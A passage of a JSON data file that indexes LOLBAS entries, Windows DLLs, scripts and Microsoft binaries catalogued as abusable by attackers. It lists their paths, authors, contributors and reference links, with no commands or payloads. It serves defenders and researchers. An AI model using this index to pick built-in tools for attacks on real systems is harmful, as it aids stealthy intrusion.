@pabraeken"],"references":["https://lolbas-project.github.io/lolbas/Libraries/Ieadvpack/"],"count":5},{"id":"lolbas:ieframe-dll","name":"Ieframe.dll","source":"LOLBAS","platform":["Windows"],"toolType":"Library","aliases":[],"fullPath":["c:\\windows\\system32\\ieframe.dll","c:\\windows\\syswow64\\ieframe.dll"],"author":"LOLBAS Team","created":"2018-05-25T00:00:00.000Z","contributors":["Jimmy @bohops","Adam @hexacorn"],"references":["https://lolbas-project.github.io/lolbas/Libraries/Ieframe/"],"count":1},{"id":"lolbas:mshtml-dll","name":"Mshtml.dll","source":"LOLBAS","platform":["Windows"],"toolType":"Library","aliases":[],"fullPath":["c:\\windows\\system32\\mshtml.dll","c:\\windows\\syswow64\\mshtml.dll"],"author":"LOLBAS Team","created":"2018-05-25T00:00:00.000Z","contributors":["Pierre-Alexandre Braeken @pabraeken"],"references":["https://lolbas-project.github.io/lolbas/Libraries/Mshtml/"],"count":1},{"id":"lolbas:pcwutl-dll","name":"Pcwutl.dll","source":"LOLBAS","platform":["Windows"],"toolType":"Library","aliases":[],"fullPath":["c:\\windows\\system32\\pcwutl.dll","c:\\windows\\syswow64\\pcwutl.dll"],"author":"LOLBAS Team","created":"2018-05-25T00:00:00.000Z","contributors":["Matt harr0ey @harr0ey"],"references":["https://lolbas-project.github.io/lolbas/Libraries/Pcwutl/"],"count":1},{"id":"lolbas:photoviewer-dll","name":"PhotoViewer.dll","source":"LOLBAS","platform":["Windows"],"toolType":"Library","aliases":[],"fullPath":["C:\\Program Files\\Windows Photo Viewer\\PhotoViewer.dll","C:\\Program Files (x86)\\Windows Photo Viewer\\PhotoViewer.dll"],"author":"Avihay Eldad","created":"2025-06-22T00:00:00.000Z","contributors":["Avihay Eldad @avihayeldad","Tommy Warren"],"references":["https://lolbas-project.github.io/lolbas/Libraries/PhotoViewer/"],"count":1},{"id":"lolbas:scrobj-dll","name":"Scrobj.dll","source":"LOLBAS","platform":["Windows"],"toolType":"Library","aliases":[],"fullPath":["c:\\windows\\system32\\scrobj.dll","c:\\windows\\syswow64\\scrobj.dll"],"author":"Eral4m","created":"2021-01-07T00:00:00.000Z","contributors":["Eral4m @eral4m"],"references":["https://lolbas-project.github.io/lolbas/Libraries/Scrobj/"],"count":1},{"id":"lolbas:setupapi-dll","name":"Setupapi.dll","source":"LOLBAS","platform":["Windows"],"toolType":"Library","aliases":[],"fullPath":["c:\\windows\\system32\\setupapi.dll","c:\\windows\\syswow64\\setupapi.dll"],"author":"LOLBAS Team","created":"2018-05-25T00:00:00.000Z","contributors":["Kyle Hanslovan (COM Scriptlet) @KyleHanslovan","Huntress Labs (COM Scriptlet) @HuntressLabs","Casey Smith (COM Scriptlet) @subTee","Nick Carr (Threat Intel) @ItsReallyNick"],"references":["https://lolbas-project.github.io/lolbas/Libraries/Setupapi/"],"count":2},{"id":"lolbas:shdocvw-dll","name":"Shdocvw.dll","source":"LOLBAS","platform":["Windows"],"toolType":"Library","aliases":[],"fullPath":["c:\\windows\\system32\\shdocvw.dll","c:\\windows\\syswow64\\shdocvw.dll"],"author":"LOLBAS Team","created":"2018-05-25T00:00:00.000Z","contributors":["Adam @hexacorn","Jimmy @bohops"],"references":["https://lolbas-project.github.io/lolbas/Libraries/Shdocvw/"],"count":1},{"id":"lolbas:shell32-dll","name":"Shell32.dll","source":"LOLBAS","platform":["Windows"],"toolType":"Library","aliases":[],"fullPath":["c:\\windows\\system32\\shell32.dll","c:\\windows\\syswow64\\shell32.dll"],"author":"LOLBAS Team","created":"2018-05-25T00:00:00.000Z","contributors":["Adam (Control_RunDLL, Control_RunDLLNoFallback) @hexacorn","Pierre-Alexandre Braeken (ShellExec_RunDLL) @pabraeken","Matt Graeber (ShellExec_RunDLL) @mattifestation","Kyle Hanslovan (ShellExec_RunDLL) @KyleHanslovan"],"references":["https://lolbas-project.github.io/lolbas/Libraries/Shell32/"],"count":4},{"id":"lolbas:shimgvw-dll","name":"Shimgvw.dll","source":"LOLBAS","platform":["Windows"],"toolType":"Library","aliases":[],"fullPath":["c:\\windows\\system32\\shimgvw.dll","c:\\windows\\syswow64\\shimgvw.dll"],"author":"Eral4m","created":"2021-01-06T00:00:00.000Z","contributors":["Eral4m @eral4m"],"references":["https://lolbas-project.github.io/lolbas/Libraries/Shimgvw/"],"count":1},{"id":"lolbas:syssetup-dll","name":"Syssetup.dll","source":"LOLBAS","platform":["Windows"],"toolType":"Library","aliases":[],"fullPath":["c:\\windows\\system32\\syssetup.dll","c:\\windows\\syswow64\\syssetup.dll"],"author":"LOLBAS Team","created":"2018-05-25T00:00:00.000Z","contributors":["Pierre-Alexandre Braeken (Execute) @pabraeken","Matt harr0ey (Execute) @harr0ey","Jimmy (Scriptlet) @bohops"],"references":["https://lolbas-project.github.io/lolbas/Libraries/Syssetup/"],"count":2},{"id":"lolbas:url-dll","name":"Url.dll","source":"LOLBAS","platform":["Windows"],"toolType":"Library","aliases":[],"fullPath":["c:\\windows\\system32\\url.dll","c:\\windows\\syswow64\\url.dll"],"author":"LOLBAS Team","created":"2018-05-25T00:00:00.000Z","contributors":["Adam (OpenURL) @hexacorn","Jimmy (OpenURL) @bohops","Malwrologist (FileProtocolHandler - HTA) @DissectMalware","r0lan (Obfuscation) @r0lan"],"references":["https://lolbas-project.github.io/lolbas/Libraries/Url/"],"count":6},{"id":"lolbas:zipfldr-dll","name":"Zipfldr.dll","source":"LOLBAS","platform":["Windows"],"toolType":"Library","aliases":[],"fullPath":["c:\\windows\\system32\\zipfldr.dll","c:\\windows\\syswow64\\zipfldr.dll"],"author":"LOLBAS Team","created":"2018-05-25T00:00:00.000Z","contributors":["Moriarty (Execution) @moriarty_meng","r0lan (Obfuscation) @r0lan"],"references":["https://lolbas-project.github.io/lolbas/Libraries/Zipfldr/"],"count":2},{"id":"lolbas:comsvcs-dll","name":"Comsvcs.dll","source":"LOLBAS","platform":["Windows"],"toolType":"Library","aliases":[],"fullPath":["c:\\windows\\system32\\comsvcs.dll"],"author":"LOLBAS Team","created":"2019-08-30T00:00:00.000Z","contributors":["modexp"],"references":["https://lolbas-project.github.io/lolbas/Libraries/Comsvcs/"],"count":1},{"id":"lolbas:cl-loadassembly-ps1","name":"CL_LoadAssembly.ps1","source":"LOLBAS","platform":["Windows"],"toolType":"Script","aliases":[],"fullPath":["C:\\Windows\\diagnostics\\system\\Audio\\CL_LoadAssembly.ps1"],"author":"Jimmy (@bohops)","created":"2021-09-26T00:00:00.000Z","contributors":["Jimmy @bohops"],"references":["https://lolbas-project.github.io/lolbas/Scripts/CL_LoadAssembly/"],"count":1},{"id":"lolbas:cl-mutexverifiers-ps1","name":"CL_Mutexverifiers.ps1","source":"LOLBAS","platform":["Windows"],"toolType":"Script","aliases":[],"fullPath":["C:\\Windows\\diagnostics\\system\\WindowsUpdate\\CL_Mutexverifiers.ps1","C:\\Windows\\diagnostics\\system\\Audio\\CL_Mutexverifiers.ps1","C:\\Windows\\diagnostics\\system\\WindowsUpdate\\CL_Mutexverifiers.ps1","C:\\Windows\\diagnostics\\system\\Video\\CL_Mutexverifiers.ps1","C:\\Windows\\diagnostics\\system\\Speech\\CL_Mutexverifiers.ps1"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Pierre-Alexandre Braeken @pabraeken"],"references":["https://lolbas-project.github.io/lolbas/Scripts/CL_Mutexverifiers/"],"count":1},{"id":"lolbas:cl-invocation-ps1","name":"CL_Invocation.ps1","source":"LOLBAS","platform":["Windows"],"toolType":"Script","aliases":[],"fullPath":["C:\\Windows\\diagnostics\\system\\AERO\\CL_Invocation.ps1","C:\\Windows\\diagnostics\\system\\Audio\\CL_Invocation.ps1","C:\\Windows\\diagnostics\\system\\WindowsUpdate\\CL_Invocation.ps1"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Jimmy @bohops","Pierre-Alexandre Braeken @pabraeken"],"references":["https://lolbas-project.github.io/lolbas/Scripts/CL_Invocation/"],"count":1},{"id":"lolbas:launch-vsdevshell-ps1","name":"Launch-VsDevShell.ps1","source":"LOLBAS","platform":["Windows"],"toolType":"Script","aliases":[],"fullPath":["C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\Tools\\Launch-VsDevShell.ps1","C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\Common7\\Tools\\Launch-VsDevShell.ps1"],"author":"Nasreddine Bencherchali","created":"2022-06-13T00:00:00.000Z","contributors":["Nasreddine Bencherchali @nas_bench"],"references":["https://lolbas-project.github.io/lolbas/Scripts/Launch-VsDevShell/"],"count":2},{"id":"lolbas:manage-bde-wsf","name":"Manage-bde.wsf","source":"LOLBAS","platform":["Windows"],"toolType":"Script","aliases":[],"fullPath":["C:\\Windows\\System32\\manage-bde.wsf"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Jimmy @bohops","Daniel Bohannon @danielbohannon","John Lambert @JohnLaTwC"],"references":["https://lolbas-project.github.io/lolbas/Scripts/Manage-bde.wsf/"],"count":2},{"id":"lolbas:pubprn-vbs","name":"Pubprn.vbs","source":"LOLBAS","platform":["Windows"],"toolType":"Script","aliases":[],"fullPath":["C:\\Windows\\System32\\Printing_Admin_Scripts\\en-US\\pubprn.vbs","C:\\Windows\\SysWOW64\\Printing_Admin_Scripts\\en-US\\pubprn.vbs"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Matt Nelson @enigma0x3"],"references":["https://lolbas-project.github.io/lolbas/Scripts/Pubprn/"],"count":1},{"id":"lolbas:syncappvpublishingserver-vbs","name":"Syncappvpublishingserver.vbs","source":"LOLBAS","platform":["Windows"],"toolType":"Script","aliases":[],"fullPath":["C:\\Windows\\System32\\SyncAppvPublishingServer.vbs"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Nick Landers @monoxgas","Casey Smith @subtee"],"references":["https://lolbas-project.github.io/lolbas/Scripts/Syncappvpublishingserver/"],"count":1},{"id":"lolbas:utilityfunctions-ps1","name":"UtilityFunctions.ps1","source":"LOLBAS","platform":["Windows"],"toolType":"Script","aliases":[],"fullPath":["C:\\Windows\\diagnostics\\system\\Networking\\UtilityFunctions.ps1"],"author":"Jimmy (@bohops)","created":"2021-09-26T00:00:00.000Z","contributors":["Nick VanGilder @nickvangilder"],"references":["https://lolbas-project.github.io/lolbas/Scripts/UtilityFunctions/"],"count":1},{"id":"lolbas:winrm-vbs","name":"winrm.vbs","source":"LOLBAS","platform":["Windows"],"toolType":"Script","aliases":[],"fullPath":["C:\\Windows\\System32\\winrm.vbs","C:\\Windows\\SysWOW64\\winrm.vbs"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Matt Graeber @mattifestation","Matt Nelson @enigma0x3","Casey Smith @subtee","Jimmy @bohops","Red Canary Company cc Tony Lambert @redcanaryco"],"references":["https://lolbas-project.github.io/lolbas/Scripts/winrm/"],"count":3},{"id":"lolbas:pester-bat","name":"Pester.bat","source":"LOLBAS","platform":["Windows"],"toolType":"Script","aliases":[],"fullPath":["c:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\<VERSION>\\bin\\Pester.bat"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Emin Atac @p0w3rsh3ll","Stamatis Chatzimangou @_st0pp3r_"],"references":["https://lolbas-project.github.io/lolbas/Scripts/Pester/"],"count":2},{"id":"lolbas:acccheckconsole-exe","name":"AccCheckConsole.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\bin\\10.0.22000.0\\x86\\AccChecker\\AccCheckConsole.exe","C:\\Program Files (x86)\\Windows Kits\\10\\bin\\10.0.22000.0\\x64\\AccChecker\\AccCheckConsole.exe","C:\\Program Files (x86)\\Windows Kits\\10\\bin\\10.0.22000.0\\arm\\AccChecker\\AccCheckConsole.exe","C:\\Program Files (x86)\\Windows Kits\\10\\bin\\10.0.22000.0\\arm64\\AccChecker\\AccCheckConsole.exe"],"author":"bohops","created":"2022-01-02T00:00:00.000Z","contributors":["Jimmy @bohops"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/AccCheckConsole/"],"count":2},{"id":"lolbas:adplus-exe","name":"adplus.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x64\\adplus.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x86\\adplus.exe"],"author":"mr.d0x","created":"2021-09-01T00:00:00.000Z","contributors":["mr.d0x @mrd0x","Nasreddine Bencherchali @nas_bench"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/adplus/"],"count":4},{"id":"lolbas:agentexecutor-exe","name":"AgentExecutor.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Microsoft Intune Management Extension\\AgentExecutor.exe"],"author":"Eleftherios Panos","created":"2020-07-23T00:00:00.000Z","contributors":["Eleftherios Panos @lefterispan"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/AgentExecutor/"],"count":2},{"id":"lolbas:applauncher-exe","name":"AppLauncher.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\Windows Kits\\10\\Microsoft User Experience Virtualization\\Management\\AppLauncher.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Microsoft User Experience Virtualization\\Management\\AppLauncher.exe"],"author":"Avihay Eldad","created":"2025-09-21T00:00:00.000Z","contributors":["Avihay Eldad @AvihayEldad"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/AppLauncher/"],"count":1},{"id":"lolbas:appcert-exe","name":"AppCert.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\App Certification Kit\\appcert.exe","C:\\Program Files\\Windows Kits\\10\\App Certification Kit\\appcert.exe"],"author":"Avihay Eldad","created":"2024-03-06T00:00:00.000Z","contributors":["Avihay Eldad @AvihayEldad"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/AppCert/"],"count":2},{"id":"lolbas:appvlp-exe","name":"Appvlp.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\Microsoft Office\\root\\client\\appvlp.exe","C:\\Program Files (x86)\\Microsoft Office\\root\\client\\appvlp.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["fab @0rbz_","Will @moo_hax","Matt Wilson @enigma0x3"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Appvlp/"],"count":2},{"id":"lolbas:bcp-exe","name":"Bcp.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\Microsoft SQL Server\\Client SDK\\ODBC\\170\\Tools\\Binn\\bcp.exe","C:\\Program Files\\Microsoft SQL Server\\Client SDK\\ODBC\\130\\Tools\\Binn\\bcp.exe","C:\\Program Files\\Microsoft SQL Server\\Client SDK\\ODBC\\110\\Tools\\Binn\\bcp.exe","C:\\Program Files (x86)\\Microsoft SQL Server\\Client SDK\\ODBC\\170\\Tools\\Binn\\bcp.exe","C:\\Program Files (x86)\\Microsoft SQL Server\\Client SDK\\ODBC\\130\\Tools\\Binn\\bcp.exe","C:\\Program Files (x86)\\Microsoft SQL Server\\Client SDK\\ODBC\\110\\Tools\\Binn\\bcp.exe","C:\\Program Files (x86)\\Microsoft SQL Server\\120\\Tools\\Binn\\bcp.exe"],"author":"Mahir Ali Khan","created":"2025-11-13T00:00:00.000Z","contributors":["Mahir Ali Khan @mahiralikhan07"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bcp/"],"count":1},{"id":"lolbas:bginfo-exe","name":"Bginfo.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["no default"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Oddvar Moe @oddvarmoe"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bginfo/"],"count":6},{"id":"lolbas:cdb-exe","name":"Cdb.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x64\\cdb.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x86\\cdb.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Matt Graeber @mattifestation","mr.d0x @mrd0x","Spooky Sec @sec_spooky","Nasreddine Bencherchali @nas_bench"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Cdb/"],"count":3},{"id":"lolbas:coregen-exe","name":"coregen.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\Microsoft Silverlight\\5.1.50918.0\\coregen.exe","C:\\Program Files (x86)\\Microsoft Silverlight\\5.1.50918.0\\coregen.exe"],"author":"Martin Sohn Christensen","created":"2020-10-09T00:00:00.000Z","contributors":["Nicky Tyrer","Evan Pena","Casey Erikson"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/coregen/"],"count":3},{"id":"lolbas:createdump-exe","name":"Createdump.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\dotnet\\shared\\Microsoft.NETCore.App\\<version>\\createdump.exe","C:\\Program Files (x86)\\dotnet\\shared\\Microsoft.NETCore.App\\<version>\\createdump.exe","C:\\Program Files\\Microsoft Visual Studio\\<version>\\Community\\dotnet\\runtime\\shared\\Microsoft.NETCore.App\\6.0.0\\createdump.exe","C:\\Program Files (x86)\\Microsoft Visual Studio\\<version>\\Community\\dotnet\\runtime\\shared\\Microsoft.NETCore.App\\6.0.0\\createdump.exe"],"author":"mr.d0x, Daniel Santos","created":"2022-01-20T00:00:00.000Z","contributors":["bopin @bopin2020"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Createdump/"],"count":1},{"id":"lolbas:csi-exe","name":"csi.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["c:\\Program Files (x86)\\Microsoft Visual Studio\\2017\\Community\\MSBuild\\15.0\\Bin\\Roslyn\\csi.exe","c:\\Program Files (x86)\\Microsoft Web Tools\\Packages\\Microsoft.Net.Compilers.X.Y.Z\\tools\\csi.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Casey Smith @subtee"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/csi/"],"count":1},{"id":"lolbas:defaultpack-exe","name":"DefaultPack.EXE","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Microsoft\\DefaultPack\\DefaultPack.exe"],"author":"@checkymander","created":"2020-10-01T00:00:00.000Z","contributors":["checkymander @checkymander"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/DefaultPack/"],"count":1},{"id":"lolbas:devinit-exe","name":"Devinit.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\Microsoft Visual Studio\\<version>\\Community\\Common7\\Tools\\devinit\\devinit.exe","C:\\Program Files (x86)\\Microsoft Visual Studio\\<version>\\Community\\Common7\\Tools\\devinit\\devinit.exe"],"author":"mr.d0x","created":"2022-01-20T00:00:00.000Z","contributors":["mr.d0x @mrd0x"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Devinit/"],"count":1},{"id":"lolbas:devtoolslauncher-exe","name":"Devtoolslauncher.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["c:\\windows\\system32\\devtoolslauncher.exe"],"author":"felamos","created":"2019-10-04T00:00:00.000Z","contributors":["felamos @_felamos"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Devtoolslauncher/"],"count":2},{"id":"lolbas:dnx-exe","name":"dnx.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["no default"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Matt Nelson @enigma0x3"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/dnx/"],"count":1},{"id":"lolbas:dotnet-exe","name":"Dotnet.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\dotnet\\dotnet.exe"],"author":"felamos","created":"2019-11-12T00:00:00.000Z","contributors":["felamos @_felamos","Jimmy @bohops","yamalon @mavinject"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dotnet/"],"count":4},{"id":"lolbas:dsdbutil-exe","name":"dsdbutil.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":["dsDbUtil.exe"],"fullPath":["C:\\Windows\\System32\\dsdbutil.exe","C:\\Windows\\SysWOW64\\dsdbutil.exe"],"author":"Ekitji","created":"2023-05-31T00:00:00.000Z","contributors":["bohop @bohops","Ekitji @eki_erk"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/dsdbutil/"],"count":5},{"id":"lolbas:dtutil-exe","name":"dtutil.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\Microsoft SQL Server\\<version>\\DTS\\Binn\\dtutil.exe","C:\\Program Files (x86)\\Microsoft SQL Server\\<version>\\DTS\\Binn\\dtutil.exe"],"author":"Avihay Eldad","created":"2024-06-17T00:00:00.000Z","contributors":["Avihay Eldad @AvihayEldad"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/dtutil/"],"count":1},{"id":"lolbas:dump64-exe","name":"Dump64.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Microsoft Visual Studio\\Installer\\Feedback\\dump64.exe"],"author":"mr.d0x","created":"2021-11-16T00:00:00.000Z","contributors":["mr.d0x @mrd0x"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dump64/"],"count":1},{"id":"lolbas:dumpminitool-exe","name":"DumpMinitool.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\Common7\\IDE\\Extensions\\TestPlatform\\Extensions\\DumpMinitool.exe"],"author":"mr.d0x","created":"2022-01-20T00:00:00.000Z","contributors":["mr.d0x @mrd0x"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/DumpMinitool/"],"count":1},{"id":"lolbas:dxcap-exe","name":"Dxcap.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Windows\\System32\\dxcap.exe","C:\\Windows\\SysWOW64\\dxcap.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Matt harr0ey @harr0ey","Vikas Singh @vikas891","Naor Evgi @ghosts621"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dxcap/"],"count":2},{"id":"lolbas:ecmangen-exe","name":"ECMangen.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Microsoft SDKs\\Windows\\<version>\\Bin\\ECMangen.exe","C:\\Program Files (x86)\\Microsoft SDKs\\Windows\\<version>\\Bin\\x64\\ECMangen.exe","C:\\Program Files\\Microsoft\\Exchange Server\\<version>\\Bin\\ECMangen.exe","C:\\Program Files\\Microsoft\\Exchange Server\\Bin\\ECMangen.exe","C:\\Program Files\\Microsoft\\Exchange Server\\ClientAccess\\Bin\\ECMangen.exe","C:\\ExchangeServer\\Bin\\ECMangen.exe"],"author":"Avihay Eldad","created":"2024-04-30T00:00:00.000Z","contributors":["Avihay Eldad @AvihayEldad"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/ECMangen/"],"count":1},{"id":"lolbas:excel-exe","name":"Excel.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Microsoft Office 16\\ClientX86\\Root\\Office16\\Excel.exe","C:\\Program Files\\Microsoft Office 16\\ClientX64\\Root\\Office16\\Excel.exe","C:\\Program Files (x86)\\Microsoft Office\\Office16\\Excel.exe","C:\\Program Files\\Microsoft Office\\Office16\\Excel.exe","C:\\Program Files (x86)\\Microsoft Office 15\\ClientX86\\Root\\Office15\\Excel.exe","C:\\Program Files\\Microsoft Office 15\\ClientX64\\Root\\Office15\\Excel.exe","C:\\Program Files (x86)\\Microsoft Office\\Office15\\Excel.exe","C:\\Program Files\\Microsoft Office\\Office15\\Excel.exe","C:\\Program Files (x86)\\Microsoft Office 14\\ClientX86\\Root\\Office14\\Excel.exe","C:\\Program Files\\Microsoft Office 14\\ClientX64\\Root\\Office14\\Excel.exe","C:\\Program Files (x86)\\Microsoft Office\\Office14\\Excel.exe","C:\\Program Files\\Microsoft Office\\Office14\\Excel.exe","C:\\Program Files (x86)\\Microsoft Office\\Office12\\Excel.exe","C:\\Program Files\\Microsoft Office\\Office12\\Excel.exe","C:\\Program Files\\Microsoft Office\\Office12\\Excel.exe"],"author":"Reegun J (OCBC Bank)","created":"2019-07-19T00:00:00.000Z","contributors":["Reegun J (OCBC Bank) @reegun21"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Excel/"],"count":1},{"id":"lolbas:fsi-exe","name":"Fsi.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\dotnet\\sdk\\<version>\\FSharp\\fsi.exe","C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Professional\\Common7\\IDE\\CommonExtensions\\Microsoft\\FSharp\\fsi.exe"],"author":"Jimmy (@bohops)","created":"2021-09-26T00:00:00.000Z","contributors":["Nick Tyrer @NickTyrer","Jimmy @bohops"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Fsi/"],"count":2},{"id":"lolbas:fsianycpu-exe","name":"FsiAnyCpu.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["c:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Professional\\Common7\\IDE\\CommonExtensions\\Microsoft\\FSharp\\fsianycpu.exe"],"author":"Jimmy (@bohops)","created":"2021-09-26T00:00:00.000Z","contributors":["Nick Tyrer @NickTyrer","Jimmy @bohops"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/FsiAnyCpu/"],"count":2},{"id":"lolbas:intellitrace-exe","name":"IntelliTrace.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\Common7\\IDE\\CommonExtensions\\Microsoft\\IntelliTrace\\IntelliTrace.exe","C:\\Program Files (x86)\\Microsoft Visual Studio\\2022\\Community\\Common7\\IDE\\CommonExtensions\\Microsoft\\IntelliTrace\\IntelliTrace.exe"],"author":"Avihay Eldad","created":"2025-09-21T00:00:00.000Z","contributors":["Avihay Eldad @AvihayEldad"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/IntelliTrace/"],"count":1},{"id":"lolbas:logger-exe","name":"Logger.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x86\\logger.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x64\\logger.exe","C:\\Program Files\\Windows Kits\\10\\Debuggers\\x86\\logger.exe","C:\\Program Files\\Windows Kits\\10\\Debuggers\\x64\\logger.exe"],"author":"Avihay Eldad","created":"2025-07-13T00:00:00.000Z","contributors":["Avihay Eldad @AvihayEldad"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Logger/"],"count":3},{"id":"lolbas:mftrace-exe","name":"Mftrace.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\bin\\10.0.16299.0\\x86\\mftrace.exe","C:\\Program Files (x86)\\Windows Kits\\10\\bin\\10.0.16299.0\\x64\\mftrace.exe","C:\\Program Files (x86)\\Windows Kits\\10\\bin\\x86\\mftrace.exe","C:\\Program Files (x86)\\Windows Kits\\10\\bin\\x64\\mftrace.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["fabrizio @0rbz_"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Mftrace/"],"count":1},{"id":"lolbas:microsoft-nodejstools-pressanykey-exe","name":"Microsoft.NodejsTools.PressAnyKey.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\Microsoft Visual Studio\\<version>\\Community\\Common7\\IDE\\Extensions\\Microsoft\\NodeJsTools\\NodeJsTools\\Microsoft.NodejsTools.PressAnyKey.exe","C:\\Program Files (x86)\\Microsoft Visual Studio\\<version>\\Community\\Common7\\IDE\\Extensions\\Microsoft\\NodeJsTools\\NodeJsTools\\Microsoft.NodejsTools.PressAnyKey.exe"],"author":"mr.d0x","created":"2022-01-20T00:00:00.000Z","contributors":["mr.d0x 